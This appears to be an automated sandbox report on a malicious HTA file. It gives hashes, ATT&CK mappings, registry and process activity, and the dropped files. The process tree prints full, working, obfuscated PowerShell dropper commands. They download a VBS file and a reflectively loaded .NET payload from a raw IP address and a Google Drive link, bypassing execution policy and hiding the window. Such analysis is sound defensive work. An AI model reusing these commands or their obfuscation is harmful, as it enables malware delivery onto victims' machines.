8762a9dea77db2f44207cc9edbc192f5776f7ac8532440ae60a65f5102f8ec93

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
30-10-2024 07:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

greatthingswithmegood.hta
Size

169KB
MD5

d61ef0038de65f697abb0b7a21b499db
SHA1

f8facfa18bf5eeecaa0601e8c1690fe60fe02ff8
SHA256

8762a9dea77db2f44207cc9edbc192f5776f7ac8532440ae60a65f5102f8ec93
SHA512

3ce0e7e8302d6b6c23ea209b07640be3b616306494d065c0293885bed194002f92bc41f4329f18465dd0ad77087afa6ce5a30a585e422f08a017306040986223
SSDEEP

48:4vaw5oZz7eWLB2rQOyeoCKcxyeoCKnAWUSl+WmpCzc/xJUdPePmkee7+SfitTFmE:4vG172ICeC4lw/HwSCirCtgQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

POWeRSHell.eXEpowershell.exe

flow pid process

4 3020 POWeRSHell.eXE
6 1688 powershell.exe
8 1688 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1144 powershell.exe
1688 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

POWeRSHell.eXEpowershell.exe

pid process

3020 POWeRSHell.eXE
2840 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
5 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
4	3020	POWeRSHell.eXE
6	1688	powershell.exe
8	1688	powershell.exe

pid	process
1144	powershell.exe
1688	powershell.exe

pid	process
3020	POWeRSHell.eXE
2840	powershell.exe

flow	ioc
6	drive.google.com
5	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

POWeRSHell.eXEpowershell.execsc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWeRSHell.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

POWeRSHell.eXEpowershell.exepowershell.exepowershell.exe

pid process

3020 POWeRSHell.eXE
2840 powershell.exe
3020 POWeRSHell.eXE
3020 POWeRSHell.eXE
1144 powershell.exe
1688 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
3020	POWeRSHell.eXE
2840	powershell.exe
3020	POWeRSHell.eXE
3020	POWeRSHell.eXE
1144	powershell.exe
1688	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

POWeRSHell.eXEpowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3020	POWeRSHell.eXE
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exePOWeRSHell.eXEcsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2128 wrote to memory of 3020	2128	mshta.exe	POWeRSHell.eXE
PID 2128 wrote to memory of 3020	2128	mshta.exe	POWeRSHell.eXE
PID 2128 wrote to memory of 3020	2128	mshta.exe	POWeRSHell.eXE
PID 2128 wrote to memory of 3020	2128	mshta.exe	POWeRSHell.eXE
PID 3020 wrote to memory of 2840	3020	POWeRSHell.eXE	powershell.exe
PID 3020 wrote to memory of 2840	3020	POWeRSHell.eXE	powershell.exe
PID 3020 wrote to memory of 2840	3020	POWeRSHell.eXE	powershell.exe
PID 3020 wrote to memory of 2840	3020	POWeRSHell.eXE	powershell.exe
PID 3020 wrote to memory of 2788	3020	POWeRSHell.eXE	csc.exe
PID 3020 wrote to memory of 2788	3020	POWeRSHell.eXE	csc.exe
PID 3020 wrote to memory of 2788	3020	POWeRSHell.eXE	csc.exe
PID 3020 wrote to memory of 2788	3020	POWeRSHell.eXE	csc.exe
PID 2788 wrote to memory of 2916	2788	csc.exe	cvtres.exe
PID 2788 wrote to memory of 2916	2788	csc.exe	cvtres.exe
PID 2788 wrote to memory of 2916	2788	csc.exe	cvtres.exe
PID 2788 wrote to memory of 2916	2788	csc.exe	cvtres.exe
PID 3020 wrote to memory of 3052	3020	POWeRSHell.eXE	WScript.exe
PID 3020 wrote to memory of 3052	3020	POWeRSHell.eXE	WScript.exe
PID 3020 wrote to memory of 3052	3020	POWeRSHell.eXE	WScript.exe
PID 3020 wrote to memory of 3052	3020	POWeRSHell.eXE	WScript.exe
PID 3052 wrote to memory of 1144	3052	WScript.exe	powershell.exe
PID 3052 wrote to memory of 1144	3052	WScript.exe	powershell.exe
PID 3052 wrote to memory of 1144	3052	WScript.exe	powershell.exe
PID 3052 wrote to memory of 1144	3052	WScript.exe	powershell.exe
PID 1144 wrote to memory of 1688	1144	powershell.exe	powershell.exe
PID 1144 wrote to memory of 1688	1144	powershell.exe	powershell.exe
PID 1144 wrote to memory of 1688	1144	powershell.exe	powershell.exe
PID 1144 wrote to memory of 1688	1144	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingswithmegood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Windows\SysWOW64\windOWSPowerShell\V1.0\POWeRSHell.eXE
  "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2840
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xml1hbew.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD36.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDD25.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2916
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3052
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1144
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESDD36.tmp

Filesize
1KB

MD5
9841f5225577e12df509ff76faccb1d9

SHA1
40776757450b02127b9e972506780ccddbdde2a6

SHA256
91255d48af631144358634b31073251c245caaaf52a70ba69911d413391918dc

SHA512
f515a9be38fd60c56de03f9433d558479b1d63107871e9e3ac84a7324e2f61e5ebebae58e3c76f6a2c928a21cc8abcf00bcb3796acac7c3c99c928fe5b2cae13

Download Submit
C:\Users\Admin\AppData\Local\Temp\xml1hbew.dll

Filesize
3KB

MD5
9f4d36a0629887a89a5c687b84f072da

SHA1
ea723f28c2d2b39a292ed36c6f3b4ac01cae49d9

SHA256
9d9f106c98defab11611518d9be0d2ceb52b0a97319629810ca12a62f1ab2b73

SHA512
ab108194298d50ebdf81ccdf19652be66aa8e3b04417b0692b40d4041e2176f265b569ed9577c11cd73fa03903b37f0d56a4f9ee1f72528819866fceedf1a140

Download Submit
C:\Users\Admin\AppData\Local\Temp\xml1hbew.pdb

Filesize
7KB

MD5
119590a74736fcd5437f25f19fc71c59

SHA1
e8c71704015f5622171d2be75e111c5874ba0e56

SHA256
fe549840ae94091e8c88561e5fd5113596e1c1e67c9cfe7365dc22a213f40c69

SHA512
937bd538faf4f44448c3311cd7f9eb2ade57083fb461087eab97819ac163f1a1a33cb9b8db2d8c8ff71aa5ca698611bb9bef59c2fd6a24c2df213dd64616399a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
f29a4de663746f1bd3852127e16f0e7d

SHA1
56223c0d57b285aa5c249233848729c414488253

SHA256
226c60c4721e3d6b718bcde04498a68640f47c33e1beaf706d01e67e0b565028

SHA512
681eb8548579ba553a672a7ab66945816c4e1cffa658b36f4588624a85c4e147314416936426f298c29faac1bfc08a85cd55f33e1a3ebbf5cb143a83634c4e1a

Download Submit
C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs

Filesize
138KB

MD5
64cc9748329c0e186cacd10d639615e6

SHA1
1291f245b185bd05fb09646b79f284d76e7dc0ff

SHA256
2c5fffa8231f572e3a34b8d4ca675aec062c3accfe661519a28e376605c0479d

SHA512
65ccbfe0223b58675aef7de997229f3ba66be892c851d6cec9018b941f3a5c5cac3c41fbe1878474213293ad25059b06e7ff7f0c4e3320d75a6fa7f071b646ba

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCDD25.tmp

Filesize
652B

MD5
4677a67ff87d3d1b62bd2e657af9524f

SHA1
03a825fcecf57e3a4b4d9cb718818b78b8b32ae7

SHA256
7e278f6f2ada4fef5cb67aea63c4a2fe4eb3a591e6af1a7101bad7419aead8fe

SHA512
bc3bf1fbe4588bf2ac0f85cc576833112ae2aff0f6b52bd304034e688f58ed6cbd59a5a70465c1980c3194857486de1e9e003580c3af809b2a9fdb40f9a2306c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xml1hbew.0.cs

Filesize
487B

MD5
8165df8b1b6d49c15b5e65811de25b8c

SHA1
fbe4fe188254b23c8b57b8d1bcd56011a93f34ba

SHA256
063172ff26517cdf762b144b713c24d423f75c6493234773c0e241c060dfa9f9

SHA512
ede5171453ece61e25baf3eef0a842e92a2b2c47c06bd4ed416f9c0a42e2bbc29f1810b97e4041dcdfd53995fc0e268f20a39188db553cf272b0374994473a2d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xml1hbew.cmdline

Filesize
309B

MD5
83125231c2e2209ff9816d2ffe6b1185

SHA1
5969d1469da2fe9a057efd83a4ea7684c38b4a54

SHA256
8cb719947ade46b73dea9415156cb5283dc22e7c04f4e784b493ce195fa93be2

SHA512
9241a5cc3d2167eaad23f4ddb7102e5fdaf191c26947de0908542e0bb9fc5467d21aaf1d34b693c919a00f46544d2cc8c2f4057cb95630b8e190892d7efe4a60

Download Submit